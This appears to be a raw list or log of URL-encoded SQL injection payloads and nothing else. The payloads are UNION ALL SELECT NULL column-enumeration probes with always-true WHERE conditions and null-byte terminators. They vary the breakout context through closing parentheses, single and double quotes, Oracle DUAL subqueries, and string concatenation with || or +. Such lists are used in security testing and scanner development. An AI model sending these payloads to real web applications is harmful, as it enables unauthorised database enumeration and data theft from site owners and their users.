1%29%20WHERE%206467%3D6467%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%29%20WHERE%203044%3D3044%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%29%20WHERE%202540%3D2540%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%29%20WHERE%205288%3D5288%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%29%20WHERE%201057%3D1057%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%29%20WHERE%206496%3D6496%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%29%20WHERE%202294%3D2294%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%29%20WHERE%207628%3D7628%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%29%20WHERE%203562%3D3562%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%29%20WHERE%208029%3D8029%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%29%20WHERE%204134%3D4134%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%29%20WHERE%204063%3D4063%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%29%20WHERE%207765%3D7765%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%29%20WHERE%208554%3D8554%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%29%20WHERE%203470%3D3470%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%29%20WHERE%201701%3D1701%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%29%20WHERE%203259%3D3259%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%29%20WHERE%203309%3D3309%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%20WHERE%209605%3D9605%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%20WHERE%206594%3D6594%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%20WHERE%209786%3D9786%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%20WHERE%201903%3D1903%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%20WHERE%208586%3D8586%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%20WHERE%201934%3D1934%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%20WHERE%206665%3D6665%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%20WHERE%205568%3D5568%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%20WHERE%205438%3D5438%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%20WHERE%206214%3D6214%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%22%20WHERE%207491%3D7491%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%22%20WHERE%206050%3D6050%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%22%20WHERE%204394%3D4394%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%22%20WHERE%204525%3D4525%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%22%20WHERE%207821%3D7821%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%22%20WHERE%205018%3D5018%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%22%20WHERE%201621%3D1621%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%22%20WHERE%203493%3D3493%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%22%20WHERE%208630%3D8630%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%22%20WHERE%209964%3D9964%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%20%7C%7C%20%28SELECT%206356%20FROM%20DUAL%20WHERE%201278%3D1278%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%207053%20FROM%20DUAL%20WHERE%204132%3D4132%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%203631%20FROM%20DUAL%20WHERE%203953%3D3953%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%202053%20FROM%20DUAL%20WHERE%205678%3D5678%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%201576%20FROM%20DUAL%20WHERE%203051%3D3051%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%204952%20FROM%20DUAL%20WHERE%201958%3D1958%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%207059%20FROM%20DUAL%20WHERE%207165%3D7165%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%207370%20FROM%20DUAL%20WHERE%205542%3D5542%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%203427%20FROM%20DUAL%20WHERE%208713%3D8713%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%209243%20FROM%20DUAL%20WHERE%202587%3D2587%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%206556%20WHERE%209335%3D9335%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%206123%20WHERE%209407%3D9407%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%201905%20WHERE%209635%3D9635%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%203223%20WHERE%208121%3D8121%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%202130%20WHERE%209980%3D9980%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%201849%20WHERE%208719%3D8719%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%204671%20WHERE%206549%3D6549%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%208711%20WHERE%202219%3D2219%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%208990%20WHERE%209537%3D9537%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%207288%20WHERE%205419%3D5419%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%20%2B%20%28SELECT%204757%20FROM%20DUAL%20WHERE%202399%3D2399%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%20%2B%20%28SELECT%208691%20FROM%20DUAL%20WHERE%207620%3D7620%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%20%2B%20%28SELECT%204925%20FROM%20DUAL%20WHERE%206069%3D6069%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%20%2B%20%28SELECT%206864%20FROM%20DUAL%20WHERE%209525%3D9525%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%20%2B%20%28SELECT%208345%20FROM%20DUAL%20WHERE%205814%3D5814%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%20%2B%20%28SELECT%209189%20FROM%20DUAL%20WHERE%203152%3D3152%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%20%2B%20%28SELECT%202519%20FROM%20DUAL%20WHERE%202284%3D2284%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%20%2B%20%28SELECT%209347%20FROM%20DUAL%20WHERE%203152%3D3152%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%20%2B%20%28SELECT%206375%20FROM%20DUAL%20WHERE%202864%3D2864%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%20%2B%20%28SELECT%207759%20FROM%20DUAL%20WHERE%201456%3D1456%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%20%2B%20%28SELECT%209855%20WHERE%207901%3D7901%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%20%2B%20%28SELECT%205225%20WHERE%207555%3D7555%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%20%2B%20%28SELECT%208929%20WHERE%207083%3D7083%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%20%2B%20%28SELECT%207644%20WHERE%208332%3D8332%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%20%2B%20%28SELECT%208724%20WHERE%204566%3D4566%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%20%2B%20%28SELECT%206312%20WHERE%209048%3D9048%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%20%2B%20%28SELECT%204913%20WHERE%204123%3D4123%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%20%2B%20%28SELECT%202324%20WHERE%203076%3D3076%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%20%2B%20%28SELECT%208928%20WHERE%201113%3D1113%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%20%2B%20%28SELECT%206580%20WHERE%205694%3D5694%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%27%20%2B%20%28SELECT%20%27iZNU%27%20FROM%20DUAL%20WHERE%208916%3D8916%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27LVAu%27%20FROM%20DUAL%20WHERE%201082%3D1082%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27ZDhC%27%20FROM%20DUAL%20WHERE%204606%3D4606%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27bKrc%27%20FROM%20DUAL%20WHERE%208946%3D8946%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27DfMs%27%20FROM%20DUAL%20WHERE%206144%3D6144%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27UfRu%27%20FROM%20DUAL%20WHERE%205884%3D5884%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27tHwx%27%20FROM%20DUAL%20WHERE%208114%3D8114%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 